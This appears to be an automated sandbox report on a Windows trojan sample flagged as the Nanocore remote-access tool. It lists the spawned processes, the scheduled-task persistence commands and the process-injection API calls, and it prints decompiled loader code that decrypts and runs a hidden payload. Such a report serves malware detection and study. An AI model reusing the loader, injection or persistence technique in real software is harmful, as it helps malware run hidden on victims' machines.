Start time:	17:49:06
Start date:	28/11/2020
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe'
Imagebase:	0x320000
File size:	271360 bytes
MD5 hash:	EE4555AC614048E36AAE067B6A032951
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 5092 Parent PID: 2440

General

Start time:	17:49:07
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5316 Parent PID: 2440

General

Start time:	17:49:12
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 2152 Parent PID: 2440

General

Start time:	17:49:12
Start date:	28/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Imagebase:	0x8e0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: NanoCore, Description: unknown, Source: 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 4928 Parent PID: 5316

General

Start time:	17:49:13
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'
Imagebase:	0xb40000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 5920 Parent PID: 2152

General

Start time:	17:49:15
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp'
Imagebase:	0xb40000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5948 Parent PID: 5920

General

Start time:	17:49:15
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2168 Parent PID: 2152

General

Start time:	17:49:15
Start date:	28/11/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1B1D.tmp'
Imagebase:	0xb40000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4120 Parent PID: 2168

General

Start time:	17:49:16
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MSBuild.exe PID: 5292 Parent PID: 528

General

Start time:	17:49:16
Start date:	28/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
Imagebase:	0x9d0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 1968 Parent PID: 5292

General

Start time:	17:49:17
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: dhcpmon.exe PID: 5972 Parent PID: 528

General

Start time:	17:49:17
Start date:	28/11/2020
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x4c0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs

Chronological Activities

Analysis Process: conhost.exe PID: 2792 Parent PID: 5972

General

Start time:	17:49:17
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: dhcpmon.exe PID: 5588 Parent PID: 3388

General

Start time:	17:49:27
Start date:	28/11/2020
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0x890000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 5860 Parent PID: 5588

General

Start time:	17:49:27
Start date:	28/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440 Parent PID: 5572 SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exeCOMMON

Executed Functions

Function 00321090, Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 147
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00321090(void* __eflags) {
				signed int _v8;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				void* _v36;
				void* _v40;
				long _v44;
				_Unknown_base(*)()* _v48;
				int _v52;
				void* _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				struct HWND__* _t53;
				intOrPtr* _t56;
				void* _t57;
				void* _t60;
				struct HWND__* _t90;
				signed int _t93;

				_t45 =  *0x32a004; // 0xf1838a0e
				_v8 = _t45 ^ _t93;
				_v12 = 0x6c;
				_v11 = 0x6c;
				_v24 = 0x6c;
				_v23 = 0x6c;
				_v20 = 0x55;
				_v19 = 0x73;
				_v18 = 0x65;
				_v17 = 0x72;
				_v16 = 0x33;
				_v15 = 0x32;
				_v14 = 0x2e;
				_v13 = 0x64;
				_v10 = 0;
				_v32 = 0x52;
				_v31 = 0x70;
				_v30 = 0x63;
				_v29 = 0x72;
				_v28 = 0x74;
				_v27 = 0x34;
				_v26 = 0x2e;
				_v25 = 0x64;
				_v22 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				LoadLibraryA( &_v20);
				_v48 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateSection");
				_t53 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtMapViewOfSection");
				_t90 = _t53; // executed
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t53, 0);
				_t29 =  &_v32; // 0x52
				_v56 = 0x4e05;
				_v52 = 0;
				_t92 = LoadLibraryA(_t29);
				_t56 = E00321000(_t55, 0xc1d83a30);
				_t86 =  &_v60;
				_t57 =  *_t56(0, 2, 0, 1, 0,  &_v60); // executed
				if(_t57 != 0 && _t57 == 0x57) {
					_t60 = 0;
					do {
						_t33 = _t60 + 0x32ac48; // 0x19ace9
						asm("ror cl, 0x2");
						asm("rol cl, 1");
						asm("rol cl, 0x3");
						 *((char*)(_t60 + 0x32ac48)) = ( !( !( *_t33 - 0x3e) - _t60 - _t60) - 0x00000032 ^ 0x000000b0) + 0x28;
						_t60 = _t60 + 1;
					} while (_t60 < 0x4e05);
					NtCreateSection( &_v40, 0xe, 0,  &_v56, 0x40, 0x8000000, 0);
					NtMapViewOfSection(_v40, 0xffffffff,  &_v36, 0, 0, 0,  &_v44, 2, 0, 0x40); // executed
					CloseHandle(_v40);
					_t86 = _v36;
					E00324210(0, _t90, _t92, _v36, 0x32ac48, 0x4e05);
					CallWindowProcW(_v36, 0x32fa50, 0, 0, 0); // executed
				}
				return E003212F4(0, 0, _v8 ^ _t93, _t86, _t90, _t92);
			}

0x00321096
0x0032109d
0x003210ac
0x003210af
0x003210b2
0x003210b5
0x003210c1
0x003210c5
0x003210c9
0x003210cd
0x003210d1
0x003210d5
0x003210d9
0x003210dc
0x003210df
0x003210e2
0x003210e6
0x003210ea
0x003210ee
0x003210f2
0x003210f6
0x003210fa
0x003210fd
0x00321100
0x00321103
0x00321106
0x00321109
0x0032110c
0x0032112d
0x00321133
0x00321136
0x00321138
0x0032113f
0x00321145
0x00321149
0x00321150
0x0032115a
0x0032115c
0x00321164
0x0032116f
0x00321173
0x00321182
0x00321184
0x00321184
0x00321191
0x0032119e
0x003211a3
0x003211a6
0x003211ac
0x003211ad
0x003211c7
0x003211e0
0x003211e6
0x003211ec
0x003211fa
0x0032120e
0x0032120e
0x00321226

APIs

LoadLibraryA.KERNEL32(?), ref: 0032110C
LoadLibraryA.KERNEL32(ntdll.dll,NtCreateSection), ref: 00321118
GetProcAddress.KERNEL32(00000000), ref: 00321121
LoadLibraryA.KERNEL32(ntdll.dll,NtMapViewOfSection), ref: 00321130
GetProcAddress.KERNEL32(00000000), ref: 00321133
GetConsoleWindow.KERNELBASE(00000000), ref: 00321138
ShowWindow.USER32(00000000), ref: 0032113F
LoadLibraryA.KERNEL32(Rpcrt4), ref: 00321153
RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 0032116F
NtCreateSection.NTDLL(?,0000000E,00000000,00004E05,00000040,08000000,00000000), ref: 003211C7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003211E0
CloseHandle.KERNEL32(?), ref: 003211E6
CallWindowProcW.USER32(?,0032FA50,00000000,00000000,00000000), ref: 0032120E

Strings

e, xrefs: 003210C9
r, xrefs: 003210CD
3, xrefs: 003210D1
ntdll.dll, xrefs: 00321113, 00321128
NtCreateSection, xrefs: 0032110E
s, xrefs: 003210C5
2, xrefs: 003210D5
NtMapViewOfSection, xrefs: 00321123
U, xrefs: 003210C1
Rpcrt4, xrefs: 00321145, 00321148

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ProcWindow$AddressSection$BeginCallCloseConsoleCreateHandleMgmtShowView
String ID: 2$3$NtCreateSection$NtMapViewOfSection$Rpcrt4$U$e$ntdll.dll$r$s
API String ID: 2339140280-34513111
Opcode ID: 677f26d3b92d5dd2b4374ae86a71fc0e3ee9304de8eec118b757af4f9c8ce0bf
Instruction ID: 992aeef2f10fde9689045d58a248fd242d42690032a8ebf5c47727d1fa42ad4d
Opcode Fuzzy Hash: 677f26d3b92d5dd2b4374ae86a71fc0e3ee9304de8eec118b757af4f9c8ce0bf
Instruction Fuzzy Hash: 53519371D04298AFEB02DBF89C89BEFBFB89B15304F444499E144B7282C6B45A09CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00AB24D4, Relevance: 24.4, APIs: 6, Strings: 7, Instructions: 1637COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,00000100), ref: 00AB483C

Strings

</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>, xrefs: 00AB48F3, 00AB48F9
\, xrefs: 00AB276F
<?xml version="1.0" encoding="UTF-16"?><Task version = "1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo><Date>2015-09-27T14:27:44.8929027</Date > <Author>, xrefs: 00AB4881, 00AB4887
</UserId></LogonTrigger><RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger></Triggers><Principals><Principal id="Author"><UserId>, xrefs: 00AB48CD, 00AB48D3
</Command></Exec></Actions></Task>, xrefs: 00AB4915, 00AB4918
</Author></RegistrationInfo><Triggers><LogonTrigger><Enabled>true</Enabled><UserId>, xrefs: 00AB48A7, 00AB48AD
D, xrefs: 00AB49F7

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: NameUser
String ID: </Author></RegistrationInfo><Triggers><LogonTrigger><Enabled>true</Enabled><UserId>$</Command></Exec></Actions></Task>$</UserId></LogonTrigger><RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger></Triggers><Principals><Principal id="Author"><UserId>$</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>$<?xml version="1.0" encoding="UTF-16"?><Task version = "1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo><Date>2015-09-27T14:27:44.8929027</Date > <Author>$D$\
API String ID: 2645101109-3025515227
Opcode ID: 6252bd12f184c66811819a8fd20c516a7f9e14155f88d4bfbf0956d577c30feb
Instruction ID: 9b0eaf6b7387fc60def2b23dc221db739fa40ad7292e6a29d5764448e58ea639
Opcode Fuzzy Hash: 6252bd12f184c66811819a8fd20c516a7f9e14155f88d4bfbf0956d577c30feb
Instruction Fuzzy Hash: 6C335850D0C7E8C9EB22C6689C587DDAEB55B12749F0841D9C18C6A293C7FB1BD8CB36

Uniqueness

Uniqueness Score: -1.00%

Function 00AB0754, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00AB081A
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,00AB126D,81AF6D4E,00AB0DB0), ref: 00AB0844
ReadFile.KERNELBASE(00000000,00000000,00AB0DB0,?,00000000,?,?,?,?,?,?,?,?,?,00AB126D,81AF6D4E), ref: 00AB085B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,00AB126D,81AF6D4E,00AB0DB0), ref: 00AB087D
FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AB126D), ref: 00AB08EF
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 00AB08FA
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,00AB126D,81AF6D4E,00AB0DB0,00000000), ref: 00AB0945

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: c6b2af83b0464cd8a8d054ef1096af03c24452ee4db4b08326e346da4f323639
Instruction ID: d85cd248b878dc273ca318844a690dea91874cf03b17a86ca2511757552863a3
Opcode Fuzzy Hash: c6b2af83b0464cd8a8d054ef1096af03c24452ee4db4b08326e346da4f323639
Instruction Fuzzy Hash: 7B516971E00218AADB119FB48C85FEFBABCAF18710F108469F641F7292E6749D01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2294, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fbd0d5a5149ae7a97e928d64d914bec4cd1cb6993b38d49be5feebb0d578738e
Instruction ID: c2962b46ca49d216f30abd00fa67ddaa890dc22cc1eaff4c63eab0e0eddf176d
Opcode Fuzzy Hash: fbd0d5a5149ae7a97e928d64d914bec4cd1cb6993b38d49be5feebb0d578738e
Instruction Fuzzy Hash: E5510170E50209FFEF11AFA0CD06BEDBAB8FF18702F108465F651B9192D7758A50AB10

Uniqueness

Uniqueness Score: -1.00%

Function 00AB000C, Relevance: 6.5, APIs: 4, Instructions: 467threadprocessinjectionCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,0000000F,0000000F,0000000F,0000000F,08000004,0000000F,0000000F,?,?,00000000,7885A56E,00000000,3921378E,00000000,2FFE2C64), ref: 00AB02D1
GetThreadContext.KERNELBASE(?,?), ref: 00AB02F3
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00AB0316
SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 00AB04D9

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: ContextProcessThread$CreateMemoryRead
String ID:
API String ID: 3262821800-0
Opcode ID: 318a9ec3ff82bd550e3518e698331a32b122b89f80c58dc30f8a3fc1fbbeb1db
Instruction ID: 8dbb46ccff4a7d6b1494d5417f88f40fb35d26286ea87bb4996bf1b2fc2fac07
Opcode Fuzzy Hash: 318a9ec3ff82bd550e3518e698331a32b122b89f80c58dc30f8a3fc1fbbeb1db
Instruction Fuzzy Hash: A4023B71910358AAEF21CFA4CD45FEEB7B8FF44710F10815AE608AB292E7759E84CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00AB19B1, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 391COMMON

Download Yara Rule

APIs

Part of subcall function 00AB1275: Sleep.KERNELBASE(?,00000000,034CF0BF), ref: 00AB1290

ExitProcess.KERNEL32(00000000), ref: 00AB1EBD

Strings

D, xrefs: 00AB1E5D
dfeb4a03a0754e93a32f10b43334d141, xrefs: 00AB1E10, 00AB1E13

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: ExitProcessSleep
String ID: D$dfeb4a03a0754e93a32f10b43334d141
API String ID: 911557368-3365933023
Opcode ID: e639060611b7facdd6bf82cdbc5e4abee7b8bfba387e25236b4b3000cabddd11
Instruction ID: 0c78d2316beee1c45dbfc0fd595580f1f9e4e03840205f99fde89247fdc86f81
Opcode Fuzzy Hash: e639060611b7facdd6bf82cdbc5e4abee7b8bfba387e25236b4b3000cabddd11
Instruction Fuzzy Hash: C1F14F25D54398EDEB61CBA8EC12BEDB7B5AF44710F10548AE608EE2D1D3B10F84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1EC6, Relevance: 1.8, APIs: 1, Instructions: 338libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,1AEEA062,55E38B1F,D1775DC4,55E38B1F,034CF0BF,55E38B1F,CD8538B2), ref: 00AB2147

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 064a3fbb6583e6fe2530e782610c0d58a75c70ec27f0c8367d3a2a09a891df4d
Instruction ID: 277214d76a4cb4ee854f63582f108e2adf199ab64f024ac5726170022518f9cf
Opcode Fuzzy Hash: 064a3fbb6583e6fe2530e782610c0d58a75c70ec27f0c8367d3a2a09a891df4d
Instruction Fuzzy Hash: 12C11225A50348ADEB60CBE4AD12FFD77B5AF48B11F205457EA0CEE1E1E3714E809B15

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2488, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00AB243D: GetFileAttributesW.KERNELBASE(?,?,8A5B2944,00AB2221,?,?,?), ref: 00AB245E

CreateDirectoryW.KERNELBASE(?,00000000,?,?,1A6CF026,?,?,?,00AB2221,?,?,?), ref: 00AB24BE

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: e8047dce8736cd03f0ee66d77550eaa6c38b96a4c3f23e4139765e1e963f7801
Instruction ID: 48639de75ec62f05e4012f3f80cff0a80de1e7617e7e8df6c2ed5c11e911b5df
Opcode Fuzzy Hash: e8047dce8736cd03f0ee66d77550eaa6c38b96a4c3f23e4139765e1e963f7801
Instruction Fuzzy Hash: 95E0ED70A20108BADF216F74CE06BED7A7CEB05741F104576B945E5913E7328E61A764

Uniqueness

Uniqueness Score: -1.00%

Function 00AB243D, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,8A5B2944,00AB2221,?,?,?), ref: 00AB245E

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6a51c526cf358a580205b75b8730d19f68e82b656a3736e979324e7cd3583dab
Instruction ID: 79e422e020750ca4837c0a5e95cf86500c25a3ad276399322d4385a05de46463
Opcode Fuzzy Hash: 6a51c526cf358a580205b75b8730d19f68e82b656a3736e979324e7cd3583dab
Instruction Fuzzy Hash: 94F015B0C00208EBDB00EFA8C9496ECBB78EB00311F1082A6E960662A3D7714AA1DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00322902, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00322902(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x362dfc = _t6;
				if(_t6 != 0) {
					 *0x3630d4 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00322917
0x0032291d
0x00322924
0x0032292b
0x00322931
0x00322927
0x00322927
0x00322927

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00322917

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 52ac2a27240a257ab63650361b845fb70281bd5aeac0613aedb491bf695e7b87
Instruction ID: a8535339c74dbfd76ece37758d0720bb7cd3d73cb78e46d097aa8a29ef484fbf
Opcode Fuzzy Hash: 52ac2a27240a257ab63650361b845fb70281bd5aeac0613aedb491bf695e7b87
Instruction Fuzzy Hash: CDD05E32690309AADB129F717C08B223BDCE384395F008436F91DC6190EAB0C9519A00

Uniqueness

Uniqueness Score: -1.00%

Function 003223D7, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003223D7() {
				void* _t1;

				_t1 = E00322365(0); // executed
				return _t1;
			}

0x003223d9
0x003223df

APIs

__encode_pointer.LIBCMT ref: 003223D9

Part of subcall function 00322365: TlsGetValue.KERNEL32(00000000,?,003223DE,00000000,00323503,003629C8,00000000,00000314,?,00321A85,003629C8,Microsoft Visual C++ Runtime Library,00012010), ref: 00322377
Part of subcall function 00322365: TlsGetValue.KERNEL32(00000005,?,003223DE,00000000,00323503,003629C8,00000000,00000314,?,00321A85,003629C8,Microsoft Visual C++ Runtime Library,00012010), ref: 0032238E
Part of subcall function 00322365: RtlEncodePointer.NTDLL(00000000,?,003223DE,00000000,00323503,003629C8,00000000,00000314,?,00321A85,003629C8,Microsoft Visual C++ Runtime Library,00012010), ref: 003223CC

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 2d3d3c333f6a1b20a43349a005911f02eebe610c096ce3339ee7cab3ae9de38a
Instruction ID: 901fd5c919fbd83817b63993df455abf58b1fefd2919d3862bf5c6da2c5f855a
Opcode Fuzzy Hash: 2d3d3c333f6a1b20a43349a005911f02eebe610c096ce3339ee7cab3ae9de38a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

